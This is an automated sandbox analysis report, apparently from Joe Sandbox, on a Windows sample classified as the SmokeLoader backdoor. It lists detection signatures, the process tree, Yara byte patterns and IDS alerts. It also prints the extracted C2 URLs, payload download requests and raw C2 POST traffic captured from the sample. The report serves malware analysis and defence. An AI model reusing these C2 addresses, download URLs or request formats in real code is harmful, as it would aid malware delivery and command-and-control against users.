Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
n72I7qB2ss.exe

Overview

General Information

Sample name:n72I7qB2ss.exe
renamed because original name is a hash value
Original sample name:0a37ce10735d313ff079296125f25ee90a74fdb5aa87d9b5f1642998c62cf05e.exe
Analysis ID:1488759
MD5:a3f7b743efab28654f201a43a0e349c5
SHA1:58c7b963cbcdbf5837109e80693d77e32ac6d150
SHA256:0a37ce10735d313ff079296125f25ee90a74fdb5aa87d9b5f1642998c62cf05e
Tags:exepst-innomi-net
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

  • System is w10x64
  • n72I7qB2ss.exe (PID: 6776 cmdline: "C:\Users\user\Desktop\n72I7qB2ss.exe" MD5: A3F7B743EFAB28654F201A43A0E349C5)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • 70C1.exe (PID: 5820 cmdline: C:\Users\user\AppData\Local\Temp\70C1.exe MD5: 2B113C0906841F9AEAAFBD43C7CD37C4)
      • AA31.exe (PID: 5312 cmdline: C:\Users\user\AppData\Local\Temp\AA31.exe MD5: 85B1854B81D15AC9116AA200304D7CA0)
  • ashcvvs (PID: 2656 cmdline: C:\Users\user\AppData\Roaming\ashcvvs MD5: A3F7B743EFAB28654F201A43A0E349C5)
  • ashcvvs (PID: 3396 cmdline: C:\Users\user\AppData\Roaming\ashcvvs MD5: A3F7B743EFAB28654F201A43A0E349C5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://mzxn.ru/tmp/index.php", "http://100xmargin.com/tmp/index.php", "http://wgdnb4rc.xyz/tmp/index.php", "http://olinsw.ws/tmp/index.php"]}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2060795194.00000000006D0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1768976686.00000000005F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000000.00000002.1768976686.00000000005F0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000000.00000002.1769088650.000000000065B000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x3a92:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.1769015337.0000000000611000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      Click to see the 7 entries

      System Summary

      barindex
      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\ashcvvs, CommandLine: C:\Users\user\AppData\Roaming\ashcvvs, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ashcvvs, NewProcessName: C:\Users\user\AppData\Roaming\ashcvvs, OriginalFileName: C:\Users\user\AppData\Roaming\ashcvvs, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\ashcvvs, ProcessId: 2656, ProcessName: ashcvvs
      Timestamp:2024-08-06T14:48:56.016106+0200
      SID:2039103
      Severity:1
      Source Port:49752
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:48:30.928546+0200
      SID:2039103
      Severity:1
      Source Port:49738
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:48:41.821298+0200
      SID:2039103
      Severity:1
      Source Port:49744
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:51:34.618408+0200
      SID:2039103
      Severity:1
      Source Port:49774
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:51:04.254415+0200
      SID:2039103
      Severity:1
      Source Port:49768
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:50:20.438920+0200
      SID:2039103
      Severity:1
      Source Port:49760
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:51:14.829048+0200
      SID:2039103
      Severity:1
      Source Port:49770
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:48:37.059237+0200
      SID:2039103
      Severity:1
      Source Port:49742
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:50:14.241484+0200
      SID:2039103
      Severity:1
      Source Port:49759
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:48:35.534785+0200
      SID:2039103
      Severity:1
      Source Port:49741
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:51:50.453126+0200
      SID:2039103
      Severity:1
      Source Port:49777
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:48:39.509615+0200
      SID:2039103
      Severity:1
      Source Port:49743
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:48:27.855659+0200
      SID:2039103
      Severity:1
      Source Port:49736
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:50:41.269726+0200
      SID:2039103
      Severity:1
      Source Port:49764
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:49:04.206062+0200
      SID:2039103
      Severity:1
      Source Port:49756
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:48:50.165626+0200
      SID:2039103
      Severity:1
      Source Port:49749
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:50:46.436979+0200
      SID:2039103
      Severity:1
      Source Port:49765
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:51:45.563822+0200
      SID:2039103
      Severity:1
      Source Port:49776
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:52:00.583525+0200
      SID:2039103
      Severity:1
      Source Port:49779
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:50:59.094118+0200
      SID:2039103
      Severity:1
      Source Port:49767
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:48:43.293459+0200
      SID:2039103
      Severity:1
      Source Port:49745
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:51:55.337366+0200
      SID:2039103
      Severity:1
      Source Port:49778
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:50:36.064848+0200
      SID:2039103
      Severity:1
      Source Port:49763
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:51:29.791538+0200
      SID:2039103
      Severity:1
      Source Port:49773
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:49:02.392745+0200
      SID:2039103
      Severity:1
      Source Port:49755
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:50:25.754267+0200
      SID:2039103
      Severity:1
      Source Port:49761
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:48:46.441446+0200
      SID:2039103
      Severity:1
      Source Port:49747
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:50:30.907851+0200
      SID:2039103
      Severity:1
      Source Port:49762
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:50:51.717674+0200
      SID:2039103
      Severity:1
      Source Port:49766
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:48:29.414572+0200
      SID:2039103
      Severity:1
      Source Port:49737
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:51:40.131887+0200
      SID:2039103
      Severity:1
      Source Port:49775
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:48:33.946645+0200
      SID:2039103
      Severity:1
      Source Port:49740
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:48:44.854879+0200
      SID:2039103
      Severity:1
      Source Port:49746
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:51:19.867733+0200
      SID:2039103
      Severity:1
      Source Port:49771
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:51:09.566965+0200
      SID:2039103
      Severity:1
      Source Port:49769
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:51:24.926341+0200
      SID:2039103
      Severity:1
      Source Port:49772
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:48:32.419301+0200
      SID:2039103
      Severity:1
      Source Port:49739
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:48:48.380629+0200
      SID:2039103
      Severity:1
      Source Port:49748
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-06T14:48:57.595341+0200
      SID:2039103
      Severity:1
      Source Port:49753
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: n72I7qB2ss.exeAvira: detected
      Source: http://100xmargin.com/tmp/index.phpAvira URL Cloud: Label: malware
      Source: https://mussangroup.com/wp-content/images/pic5.jpgAvira URL Cloud: Label: malware
      Source: http://mzxn.ru/tmp/index.phpAvira URL Cloud: Label: malware
      Source: C:\Users\user\AppData\Roaming\ashcvvsAvira: detection malicious, Label: HEUR/AGEN.1318094
      Source: 00000000.00000002.1768976686.00000000005F0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://mzxn.ru/tmp/index.php", "http://100xmargin.com/tmp/index.php", "http://wgdnb4rc.xyz/tmp/index.php", "http://olinsw.ws/tmp/index.php"]}
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeReversingLabs: Detection: 31%
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeReversingLabs: Detection: 54%
      Source: C:\Users\user\AppData\Roaming\ashcvvsReversingLabs: Detection: 71%
      Source: n72I7qB2ss.exeReversingLabs: Detection: 71%
      Source: n72I7qB2ss.exeVirustotal: Detection: 58%Perma Link
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: C:\Users\user\AppData\Roaming\ashcvvsJoe Sandbox ML: detected
      Source: n72I7qB2ss.exeJoe Sandbox ML: detected
      Source: n72I7qB2ss.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: unknownHTTPS traffic detected: 45.130.41.250:443 -> 192.168.2.4:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.4:49754 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.4:49754 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49757 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49758 version: TLS 1.2
      Source: Binary string: ntdll.pdb source: 70C1.exe, 00000006.00000002.2419427291.000001CD107C0000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419568092.000001CD109CC000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2420364973.000001CD111C0000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418138051.000001CD0F9C9000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417727396.000001CD0F5C8000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418875310.000001CD101C1000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2421444762.000001CD11BCD000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417555234.000001CD0F3CF000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2416835332.000001CD0EDCF000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2421255150.000001CD119C7000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417004078.000001CD0EFC2000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2420171669.000001CD10FCA000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417924534.000001CD0F7C4000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2420564826.000001CD113CE000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418324178.000001CD0FBC4000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417355522.000001CD0F1C1000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419945194.000001CD10DC1000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419145203.000001CD103C2000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418675219.000001CD0FFC4000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2421629080.000001CD11DC1000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2421043779.000001CD117C0000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418494622.000001CD0FDC8000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419281806.000001CD105CB000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419745402.000001CD10BC6000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2420797717.000001CD115CB000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2493490885.00000253644CC000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2492962721.00000253642C5000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2492406389.0000025363ECF000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2490286144.00000253638C6000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2494767463.00000253650C3000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2495732723.000
      Source: Binary string: ntdll.pdbUGP source: 70C1.exe, 00000006.00000002.2419427291.000001CD107C0000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419568092.000001CD109CC000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2420364973.000001CD111C0000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418138051.000001CD0F9C9000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417727396.000001CD0F5C8000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418875310.000001CD101C1000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2421444762.000001CD11BCD000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417555234.000001CD0F3CF000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2416835332.000001CD0EDCF000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2421255150.000001CD119C7000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417004078.000001CD0EFC2000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2420171669.000001CD10FCA000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417924534.000001CD0F7C4000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2420564826.000001CD113CE000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418324178.000001CD0FBC4000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417355522.000001CD0F1C1000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419945194.000001CD10DC1000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419145203.000001CD103C2000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418675219.000001CD0FFC4000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2421629080.000001CD11DC1000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2421043779.000001CD117C0000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418494622.000001CD0FDC8000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419281806.000001CD105CB000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419745402.000001CD10BC6000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2420797717.000001CD115CB000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2493490885.00000253644CC000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2492962721.00000253642C5000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2492406389.0000025363ECF000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2490286144.00000253638C6000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2494767463.00000253650C3000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2495732723.
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_0042379F GetLogicalDriveStringsW,DeleteVolumeMountPointW,GetCommandLineA,lstrcatW,InterlockedExchange,GetActiveWindow,GetSystemWindowsDirectoryW,WriteConsoleW,IntersectRect,FlushInstructionCache,GetAtomNameA,GlobalDeleteAtom,GetCurrentConsoleFont,SearchPathA,GetDefaultCommConfigA,DebugBreak,EnumDateFormatsW,SetCommMask,GetTickCount,GetSystemTimes,FoldStringW,OpenWaitableTimerA,HeapLock,FormatMessageW,GlobalAlloc,LoadLibraryA,0_2_0042379F

      Networking

      barindex
      Source: C:\Windows\explorer.exeNetwork Connect: 45.130.41.250 443Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 190.187.52.42 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 58.151.148.90 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 185.149.100.242 443Jump to behavior
      Source: Malware configuration extractorURLs: http://mzxn.ru/tmp/index.php
      Source: Malware configuration extractorURLs: http://100xmargin.com/tmp/index.php
      Source: Malware configuration extractorURLs: http://wgdnb4rc.xyz/tmp/index.php
      Source: Malware configuration extractorURLs: http://olinsw.ws/tmp/index.php
      Source: Joe Sandbox ViewIP Address: 190.187.52.42 190.187.52.42
      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
      Source: Joe Sandbox ViewASN Name: BEGET-ASRU BEGET-ASRU
      Source: Joe Sandbox ViewASN Name: AMERICATELPERUSAPE AMERICATELPERUSAPE
      Source: Joe Sandbox ViewASN Name: POWERVIS-AS-KRLGPOWERCOMMKR POWERVIS-AS-KRLGPOWERCOMMKR
      Source: Joe Sandbox ViewASN Name: VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: global trafficHTTP traffic detected: GET /build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: browserupdater.com
      Source: global trafficHTTP traffic detected: GET /wp-content/images/pic5.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
      Source: global trafficHTTP traffic detected: POST /dnbcompany_lt1jns?r8nly8r5hpamvqwa=wPH3ORWQpCff0Rbkjeq7BHUXYUTSjq2ZvEO74fzamCqz4bPud6wNFWcNcvb5H2uEbiUuLc8s9wrJ4LD3%2BwxZ6g%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Content-Length: 96Host: mundoparachicas.space
      Source: global trafficHTTP traffic detected: POST /imageFolio.cgi?qehii0w3ze9sn=nO6wgakvlUvUKyvVvRezNJaB0mAvGbPqVKo12a3LOUvhvPrA9eFcs3uIBjr2ICTAiCiRSrnI1BD1Zngf6t0fTw%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 96Host: mundoparachicas.space
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lxtihacslghmp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wbqhwxcwiokrti.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yrcjsrfdprvic.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://knlbxirdtde.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nbynuqvcubp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uvlrqtxncwdcr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 369Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fwffjwnakkt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 217Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hlaxjpgxxibka.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qxykcmjeqiqyjoi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vqtbeoidrbmewm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sowqaemgjxhutlr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qggmqqxdvbb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cypfufcosssb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://asulighvhvx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://typuxgfkyjirf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://alapkefvafgo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: mzxn.ru
